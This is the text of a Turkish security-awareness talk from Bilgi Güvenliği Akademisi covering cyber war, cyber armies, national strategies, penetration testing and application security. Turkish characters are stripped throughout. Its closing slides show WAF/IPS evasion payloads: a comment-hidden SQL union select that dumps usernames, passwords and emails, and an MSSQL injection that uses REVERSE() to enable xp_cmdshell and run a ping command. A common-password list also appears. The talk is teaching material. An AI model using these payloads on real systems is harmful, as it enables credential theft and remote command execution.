Siber Tehditler, Savunma Yntemleri ve Hackerlarn Baars

Huzeyfe NAL Bilgi Gvenlii AKADEMS honal@bga.com.tr www.bga.com.tr

Konumac Hakknda |Huzeyfe NAL

Bilgi Gvenlii Danman (i hayat)
Bilgi Gvenlii AKADEMS(www.bga.com.tr)

A Gvenlii Aratrmacs (gerek hayat) Blogger

www.lifeoverip.net

Bilgi Gvenlii AKADEMS | www.bga.com.tr

Genel Terim ve Kavramlar

Siber sava(cyber warfare), siber tehditler, siber su(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terrizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), szma testleri (penetration test), siber gvenlik yarmalar(CTF -Capture The Flag)

Teknolojinin Yaam Dngs

Teknolojiyi Aratr

Gvenliini Sala

Teknolojiyi Al

Teknolojiyi Kullan

Teknolojiyi ren

Obamadan nciler...

So cyberspace is real. And so are the risks that come with it. In short, America's economic prosperity in the 21st century will depend on cybersecurity. it's now clear this cyber threat is one of the most serious economic and national security challenges we face as a nation. And finally, we will begin a national campaign to promote cybersecurity awareness

Siber Hayat
Siber tanm: Altyaps biliim sistemleri olan ve gerek hayatn glgesi niteliindeki yaam. Alveri, oyun, film, mzik, ticaret, yemek, komuluk, istihbar bilgi toplama vs gibi gerek hayatn vazgeilmez ileri siber hayatta da benzeri isimlerle yer almaktadr. Halk iinde sanal dnya olarak da bilinir.

Siber Gvenlik
Siber hayatn gvenlii(gizlilik, btnlk ve eriilebilirlik) salanmas amacyla gerekletirilen faaliyetlerin tm. Bilgi gvenliinden fark: daha soyut ve geni bir alan kapsamas
Bilgi gvenlii teknik, siber gvenlik sosyal bir tanmdr.

~2015li yllarda en sk kullanlacak tanmlardan.

Siber Gvenlik Gerek Dnyay nasl Etkiler?

Wikileaks...
Ortadouda devlet bakanlarnn son durumu

Trkiyede kaset mevzular

Siber dnyann salad snrsz zgrlk(?) sayesinde kiilerin zel yaam kavram kalmayacaktr

22 Austosda Trkiye internetinde gerekletirilecek kstlamalar

Artk tm internet kullanclar belirli profil seerek internete balanacak ve izlenebilecek!

Gncel Durum
Siber hayat kavramnn yerlemesi. Siber gvenlik, siber sava, siber ordu tanmlarnn konuulmaya balanmas. Yerli gvenlik yazlmlarnn gelitirilmeye balanmas(yerli retim %0,1 seviyelerinde) Temel eksiklik: bilgi gvenlii farkndal, teknik konularda alanlarn temel bilgi eksiklii. Siber gvenliin lks deil, gereksinim olduu fikrinin yaygnlamas. Siber Gvenlik Dernei kurulumu.(2011)

Siber Tehditler
Bilgi gvenliini ihlal edecek tm faaliyetler
DDoS saldrlar: internet zerinden sistemlerin eriilebilir olmasn engelleme Hacking aktiviteleri
Bilgi szdrma faaliyetleri
RSA Sony PS a yelerinin bilgilerinin szmas

Prestij zarar verme faaliyetleri

Siber Sava
Biliim sistemleri kullanlarak gerekletirilen ve amac bir irkete, bir lkeye veya bir gruba ynelik maddi, manevi zararlar verme olan faaliyetler. 2007 Estonya rnei:
DDoS saldrlaryla lkenin internet sisteminin ilemez hale getirilmesi

2010 Trkiye rnei:

Yotube yasan protesto eden bir grup Hacker eitli bakanlk sitelerine ynelik DDoS saldrlar gerekletirdi.

2011 Trkiye rnei:

Anonymous grubunun 22 Austosu protesto eden saldrlar Etkilenen kurumlar?

Siber Sava Taraflar

Hacker gruplar Ticari markalar, ticari firmalar Devletler Muhalif gruplar

Siber Ordu
lkeyi, kurumu siber dnyadan gelebilecek tehlikelere kar koruyacak ve gerektiinde siber saldrlar gerekletirebilecek yetenekteki bilgi gvenlii uzmanlarnn Siber ordu mensubu tm askerler hem saldr hem de koruma yntemlerini ok iyi bilmek zorundadrlar . ki tr siber ordu bulunmaktadr:
Devlet eliyle yetitirilen resmi birimler Gnll fakat resmi aya olmayan birimler

Dnyadaki Siber Ordular

lk siber ordu Amerika Birleik Devletleri tarafndan gizli olarak kurulmutur. Bu konuda en nemli yatrmlardan biri K.Koredir. Trkiyede henz bilinen dzenli bir siber ordu yoktur. Baz lkelerde gnll, siber ordular bulunmaktadr. 2010 ylnda birok lke siber ordu konusunu gndemine almtr.

Cyber spying
eitli hacking yntemleri kullanlarak hedef irket/kurum/devletten bilgi szdrmak
zellikle istihbarat tekilatlarnn sk bavurduu yntemlerden biridir. stihbarat tekilatlar gvenlik sistemlerine yakalanmayacak malware, virs gelitirme konusunda ciddi yatrmlar gerekletirmektedir. Bunun en iyi rnei randa yaanan Stuxnet ad verilen ve dorudan SCADA sistemlere ynelik aksiyon alan ktcl yazlmdr.

Cyber weapon
Klasik dnyadaki silah kavramndan farkl olarak siber silah sadece yoketme amac tamamaktadr. Yeri geldiinde yoketme, yeri geldiinde iz silme ve yeri geldiinde hedef sistemlerden bilgi karma amal kullanlacak yntem ve aralardr. Stuxnet en gncel ve ideal siber silah rneidir.

Siber Casus
Siber casuslar siber ordu elemanlardr En az 3 yl sren zel eitimlerden geirilerek bilgi gvenliine ait tm konular bilen ve 3 konuda ileri seviye uzman olan kiilere verilen lakaptr. Bu kiilerin grevleri biliim sistemlerini kullanarak bilgi szdrmaktr. Grevleri genellikle teknoloji irketlerinde bilgisayarla ilgili herhangi bir alandr

lkelerin siber gvenlik stratejileri

Siber gvenlik konusunda alnacak stratehjiler dorudan o lkenin gelimiliiyle alakaldr Siber gvenlik demek teknolojiden daha fazla faydalanlyor demek ve daha fazla korunma ihtiyac duyuluyor demektir. 2008-2011 yllar arasnda ou gelimi lke siber gvenlik stratejilerini aklam ve yrrle koymutur. Trkiyede henz kabul edilen bir siber gvenlik stratejisi yoktur
Krmz kitaba eklenen satr hari

lkelerin siber gvenlik stratejileri

Canada Cyber Security Strategy
http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scceng.pdf

ESTONIA Cyber Security Strategy

http://www.mod.gov.ee/files/kmin/img/files/Kuberjulg eoleku_strateegia_2008-2013_ENG.pdf

Cyber Security Strategy for Germany

http://www.bmi.bund.de/SharedDocs/Downloads/DE/ Themen/OED_Verwaltung/Informationsgesellschaft/cy ber_eng.pdf?__blob=publicationFile

lkelerin siber gvenlik stratejileri

Cyber Security Strategy of the United Kingdom
http://www.computerweekly.com/blogs/read-allaboutit/Cabinet%20Office%20Cybersecurity%20review%2009 .pdf

Australian Government Cyber SeCurity Strategy

http://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/ (4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+ Security+Strategy++for+website.pdf/$file/AG+Cyber+Security+Strategy++for+website.pdf

Penetration test
Sistemlerin gvenliini test ettirmek amacyla gerekletirilen ve hackerlarn kullandklar yntemleri kullanan beyaz apkallarn gzyle sistem aklklarnn aranmas
Whitebox pentest Blackbox pentest Olmak zere temelde ikiye ayrlr. Ciddi teknik altyap gerektiren bir prosestir.

CTF -Capture The Flag

Bilgi gvenlii uzmanlarnn offensive security konular hakknda bilgi sahibi olmalar ve pratik yapmalar iin gelitirilmi bir oyun trdr. Genellikle red team(saldrgan) ve blue team olmak zere ikiye ayrlrlar Red team hedefleri ele geirmeye, blue team de hedefleri savunmaya ynelik abalar. Ve oyun boyunca her iki taraf da pratik olarak bilgilerini kullanma ve test etme ans yakam olur.

II. Blm
Bilgi Gvenlii AKADEMS | www.bga.com.tr
23

Klasik Gvenlik Anlay

Tmden savunma! rn temelli bir gvenlik anlay
rn= sihirbaz bak as(bilgi-sayar)

Trkiyeye zel deil tm dnya iin geerli Teknik sorunlar teknik yollarla zlr, insani sorunlar insanla zlr Temel bilgi sahibi olmadan ileri seviye iler yapmaya alma
TCP/IP bilmeden Firewall/IPS ynetmek
Bilgi Gvenlii AKADEMS | www.bga.com.tr
24

Uygulama Gvenlii Nedir?

Yazlm gelitiriciler en ksa srede ortaya rn karma peindeler. Guvenlik uzmanlar younlukla altyap gvenliine ynelmilerdir Uygulama Gvenlii: retilen yazlmn fonksiyonlarn yitirmeden gvenli bir ekilde gelitirilmesini salama.

Uygulama Gvenlii

Yazlm Gelitirme

IT Gvenlik

25

Neden Uygulama Gvenlii

Hacking Stage 6
Wikipedia, Feb 9 2007

Bilgi Gvenlii AKADEMS | www.bga.com.tr

26

Neden Uygulama Gvenlii, devam

Bilgi Gvenlii AKADEMS | www.bga.com.tr

27

Gvenlik Dnyasnn Gidiat

Firewall

IDS/IPS

WAF

Hackerlarin Gidiat

Client inSecurity

Mobile inSecurity

Social Networks/Eng.

Hacker / gvenlik uzman

Gvenlik uzmanlar prosedrel hareket ettii iin hackerlara gre bir adm geriden gelir. Gvenlik uzmanlar iin koruma bir meslek, hackerlar iin bu korumalar amak bir zevktir. Hacker iin bilgi gvenlii diye bir kavram yoktur, sadece almas gereken engel vardr! Hackerlarn mesaisi, says ve motivasyonu farkldr...
Siber dnyada gece gndz kavramlar yoktur 7/24 mesai yaparlar!

rnek: Wordpress akl

Bak As

SMS ile kaos oluturma!

HTTPS zerinden Free Internet

Baz durumlarda HTTPS portu zerinde hi eriim kontrol olmayabilir

SQL Yorumlar ile IPS Atlatma

/* comment */ yorum satr olarak alglanr(SQL +WAF+IPS tarafndan) /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak alglanmaz(SQL tarafndan)(WAF+IPSler tarafndan yorum olarak alglanr) /?id=1/*!limit+0+union+select+concat_ws(0x3a,us ername,password,email)+from+users*/

Bilgi Gvenlii AKADEMS | www.bga.com.tr

34

Encoding Kullanarak IPS Atlatma

Inline alan WAF/IPSlerde ie yarar

Bilgi Gvenlii AKADEMS | www.bga.com.tr

35

SQL Reverse Fonksiyonu ile IPS Atlatma

SQL Sunucularda bulunan reverse fonksiyonu kullanlr
Reverse(lqs) = sql

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('08.911.39.19 gnip" llehsdmc_px') EXEC (@c);- REVERSE('08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80
Bilgi Gvenlii AKADEMS | www.bga.com.tr
36

Parola Profilimiz
123456 123456789 0 111111 123123 14531453 1234567 123654 19861986 12345678 666666

NetSec A Ve Bilgi Gvenlii Topluluu

Trkiyenin en geni katlml bilgi gvenlii e-posta listesi ve topluluu
~1200 ye

cretsiz ye olabilirsiniz. Gvenlik dnyasnda yaynlanan nemli haberler, gvenlik yamalar ve birok teknik konuda tartma... yelik iin
http://www.lifeoverip.net/netsec-listesi/
Bilgi Gvenlii AKADEMS | www.bga.com.tr
38

Sorular?

Bilgi Gvenlii AKADEMS | www.bga.com.tr

39

Bilgi Gvenlii AKADEMS

Bilgi Gvenlii AKADEMS | www.bga.com.tr

40